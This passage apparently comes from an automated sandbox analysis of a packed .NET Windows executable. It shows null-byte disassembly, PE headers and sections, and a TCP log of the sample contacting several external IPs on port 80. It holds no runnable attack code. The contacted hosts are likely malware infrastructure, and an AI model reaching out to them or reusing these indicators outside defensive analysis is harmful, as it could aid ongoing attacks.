                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xecfa80x57.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x5fc.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x20000xeb0080xeb200False0.932915711390218data7.937047832644545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0xee0000x5fc0x600False0.4401041666666667data4.161409298913876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0xf00000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_VERSION0xee0a00x3a8data0.4155982905982906
                                                                                                                            RT_MANIFEST0xee4480x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 10, 2023 09:27:28.974637032 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.170547009 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.170706034 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.171799898 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.367506027 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.367919922 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.367961884 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368074894 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368112087 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368136883 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.368148088 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368185997 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368223906 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368253946 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.368259907 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368290901 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.368295908 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:29.368319035 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.368367910 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.369051933 CET4971480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:27:29.565602064 CET804971484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.205852032 CET4971580192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:45.358423948 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.358730078 CET4971580192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:45.358906984 CET4971580192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:45.511161089 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.742500067 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.742522001 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.742536068 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.742547989 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.742562056 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.742702007 CET4971580192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:45.743485928 CET804971523.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:45.743542910 CET4971580192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:46.860749006 CET4971580192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:47.876622915 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:48.029113054 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.029452085 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:48.029633999 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:48.182041883 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808260918 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808281898 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808290005 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808305025 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808312893 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808763027 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:48.808900118 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808979988 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:49.532341957 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.562339067 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.715975046 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:50.716085911 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.716406107 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.869008064 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:50.869034052 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133230925 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133271933 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133285046 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133299112 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133311033 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133429050 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:51.133456945 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:51.133461952 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133531094 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:52.220259905 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.235866070 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.388351917 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.388469934 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.388838053 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.541204929 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617281914 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617347002 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617383957 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617458105 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.617760897 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617856979 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.617950916 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.770258904 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.339667082 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:27:59.646331072 CET804971991.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.646446943 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:27:59.646814108 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:27:59.953897953 CET804971991.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.953918934 CET804971991.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.954125881 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:01.157303095 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.173470974 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.480637074 CET804972091.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:02.480907917 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.481271982 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.789205074 CET804972091.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:02.789237976 CET804972091.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:02.789371967 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:03.986037970 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.001790047 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.306581020 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.306775093 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.310724020 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.615365028 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.615788937 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.615803957 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.615844965 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:06.813596010 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:07.829838991 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.134253979 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.134418011 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.134658098 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.479257107 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494031906 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494050026 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494061947 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494076014 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494088888 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494131088 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494167089 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494168997 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494184017 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494195938 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494209051 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494220972 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494220972 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494256020 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494282007 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798624992 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798654079 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798669100 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798681974 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798696995 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798708916 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798708916 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798728943 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798737049 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798755884 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798769951 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798772097 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798804998 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798810005 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798820972 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798834085 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798847914 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798847914 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798875093 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798971891 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.799149990 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:09.103380919 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:15.184653044 CET4972480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:15.380403996 CET804972484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:15.380573988 CET4972480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:15.448548079 CET4972480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:15.644114971 CET804972484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:15.644188881 CET804972484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:17.970448971 CET4972580192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:18.166167021 CET804972584.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:18.166328907 CET4972580192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:18.175122976 CET4972580192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:18.371335983 CET804972584.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:18.371519089 CET804972584.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:20.704658031 CET4972680192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:20.900512934 CET804972684.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:20.900778055 CET4972680192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:20.903774977 CET4972680192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:21.099773884 CET804972684.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:21.099842072 CET804972684.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.423567057 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.619235039 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.619472027 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.619740963 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815361023 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815479040 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815623999 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815680981 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815720081 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815751076 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815761089 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815783024 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815800905 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815839052 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815872908 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815876961 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815913916 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815924883 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815972090 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.816148043 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:24.011737108 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:28.992280960 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.144360065 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.144541025 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.144850016 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.296765089 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.418311119 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.418328047 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.418339968 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.418427944 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.433980942 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.434097052 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:30.659737110 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:32.921482086 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:33.073390961 CET8049729199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:33.073573112 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:33.133064985 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:33.285177946 CET8049729199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:33.343295097 CET8049729199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:33.343338013 CET8049729199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:33.343374014 CET8049729199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:33.343393087 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:33.343417883 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:33.355670929 CET8049729199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:33.355720997 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:34.641649961 CET4972980192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:35.657944918 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:35.810029984 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:35.810216904 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:35.810514927 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:35.962465048 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:35.962492943 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:36.084145069 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:36.084173918 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:36.084192038 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:36.084285021 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:36.084435940 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:36.097115993 CET8049730199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:36.097300053 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:37.317540884 CET4973080192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.329684973 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.481719017 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:38.481942892 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.482089043 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.634016037 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:38.750719070 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:38.750745058 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:38.750758886 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:38.751036882 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.751036882 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.751194000 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.766060114 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:38.766161919 CET4973180192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:38.903095007 CET8049731199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:43.997538090 CET4973280192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:44.188318014 CET8049732162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:44.188535929 CET4973280192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:44.188903093 CET4973280192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:44.379303932 CET8049732162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:44.492309093 CET8049732162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:44.492448092 CET8049732162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:44.492537975 CET4973280192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:45.718225956 CET4973280192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:46.721118927 CET4973380192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:46.912209988 CET8049733162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:46.912372112 CET4973380192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:46.913254023 CET4973380192.168.2.10162.0.222.119
                                                                                                                            Nov 10, 2023 09:28:47.104083061 CET8049733162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:47.207586050 CET8049733162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:47.207614899 CET8049733162.0.222.119192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:47.207798004 CET4973380192.168.2.10162.0.222.119
